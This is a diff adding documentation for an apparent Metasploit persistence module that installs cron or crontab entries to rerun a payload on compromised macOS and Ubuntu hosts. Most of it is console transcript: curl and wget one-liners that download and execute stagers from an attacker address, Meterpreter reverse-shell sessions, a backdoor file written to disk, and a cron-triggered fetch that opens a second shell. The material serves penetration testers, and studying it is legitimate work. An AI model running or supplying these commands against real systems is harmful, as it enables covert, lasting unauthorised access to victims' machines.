update cron to persistence mixin

documentation/modules/exploit/multi/persistence/cron.md

@@ -0,0 +1,213 @@
+## Vulnerable Application
+
+This module will create a cron or crontab entry to execute a payload.
+The module includes the ability to automatically clean up those entries to prevent multiple executions.
+syslog will get a copy of the cron entry.
+
+Verified on Ubuntu 22.04.1, MacOS 13.7.4
+
+## Verification Steps
+
+1. Start msfconsole
+2. Exploit a box via whatever method
+3. Do: `use exploit/multi/persistence/cron`
+4. Do: `set session #`
+5. Do: `set target #`
+6. Optional Do: `set username` (depends on target selection)
+7. Do: `exploit`
+
+## Options
+
+### USERNAME
+
+Set a specific user's crontab if target 'User Crontab' is selected
+
+### TIMING
+
+Set cron's timing.  Default is to run within a minute.  Defaults to `* * * * *`
+
+### PAYLOAD_NAME
+
+If using a non-cmd/fetch payload, the name of the payload file. Defaults to random.
+
+## Scenarios
+
+### MacOS 13.7.4
+
+Initial access via web delivery
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 8
+target => 8
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/osx/x64/meterpreter/reverse_tcp
+payload => osx/x64/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > exploit
+[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 111.111.1.111
+lhost => 111.111.1.111
+[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
+[*] Started reverse TCP handler on 0.0.0.0:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+curl -sk --output 4aJvtPCb http://111.111.1.111:8181/l; chmod +x 4aJvtPCb; ./4aJvtPCb& disown
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (815032 bytes) to 172.17.0.3
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 172.17.0.3:49171) at 2025-02-17 17:14:43 -0500
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/Users/macos) > sysinfo
+Computer     : 20.20.20.21
+OS           : macOS Ventura (macOS 13.7.4)
+Architecture : x86
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+(Meterpreter 1)(/Users/macos) > getuid
+Server username: macos
+(Meterpreter 1)(/Users/macos) > background
+[*] Backgrounding session 1...
+```
+
+Due to networking issues, persistence payload is a cmd to touch a file.
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/cron 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set target 2
+target => 2
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set payload payload/osx/x64/exec
+payload => osx/x64/exec
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set cmd "/usr/bin/touch /Users/macos/executed_demo"
+cmd => /usr/bin/touch /Users/macos/executed_demo
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set AllowNoCleanup true
+AllowNoCleanup => true
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set user macos
+user => macos
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set writabledir /Users/macos
+writabledir => /Users/macos
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) > 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found
+[*] Writing backdoor to /Users/macos/nGnXw
+[*] Writing '/Users/macos/nGnXw' (17204 bytes) ...
+[*] Utilizing crontab since we can't write to /var/at/tabs/
+[+] Payload will be triggered when cron time is reached
+[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/Users/macos) > ls
+Listing: /Users/macos
+=====================
+Mode              Size    Type  Last modified              Name
+----              ----    ----  -------------              ----
+100400/r--------  7       fil   2025-02-17 09:22:02 -0500  .CFUserTextEncoding
+040700/rwx------  64      dir   2025-02-17 09:23:29 -0500  .Trash
+100600/rw-------  4057    fil   2025-02-17 12:46:46 -0500  .viminfo
+100600/rw-------  1291    fil   2025-02-17 17:11:33 -0500  .zsh_history
+040700/rwx------  256     dir   2025-02-17 17:11:33 -0500  .zsh_sessions
+100755/rwxr-xr-x  815032  fil   2025-02-17 12:23:58 -0500  2gXD9pz
+040700/rwx------  96      dir   2025-02-17 09:21:18 -0500  Desktop
+040700/rwx------  96      dir   2025-02-17 09:21:18 -0500  Documents
+040700/rwx------  96      dir   2025-02-17 09:21:18 -0500  Downloads
+040700/rwx------  2464    dir   2025-02-17 11:17:13 -0500  Library
+040700/rwx------  96      dir   2025-02-17 09:21:18 -0500  Movies
+040700/rwx------  96      dir   2025-02-17 09:21:18 -0500  Music
+040700/rwx------  128     dir   2025-02-17 11:14:18 -0500  Pictures
+040755/rwxr-xr-x  128     dir   2025-02-17 09:21:18 -0500  Public
+100644/rw-r--r--  0       fil   2025-02-17 17:19:00 -0500  executed_demo
+100700/rwx------  17204   fil   2025-02-17 17:18:27 -0500  nGnXw
+```
+
+### Ubuntu 22.04.1
+
+Initial access via web delivery
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO xKgxaWNl --no-check-certificate http://111.111.1.111:8181/l; chmod +x xKgxaWNl; ./xKgxaWNl& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.22
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:47100) at 2025-02-17 17:36:07 -0500
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/home/ubuntu) > getuid
+Server username: ubuntu
+(Meterpreter 1)(/home/ubuntu) > sysinfo
+Computer     : 222.222.2.22
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/home/ubuntu) > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/persistence/cron 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(multi/persistence/cron) > rexploit
+[*] Reloading module...
+[*] Command to run on remote host: curl -so ./yMuAETldii http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./yMuAETldii;./yMuAETldii&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(multi/persistence/cron) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Cron timing is valid, no cron.deny entries found
+[*] Utilizing crontab since we can't write to /var/spool/cron/crontabs
+[+] Payload will be triggered when cron time is reached
+[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
+[*] Sending payload to 222.222.2.22 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.22
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:43108) at 2025-02-17 17:38:02 -0500
+[msf](Jobs:2 Agents:2) exploit(multi/persistence/cron) >
+```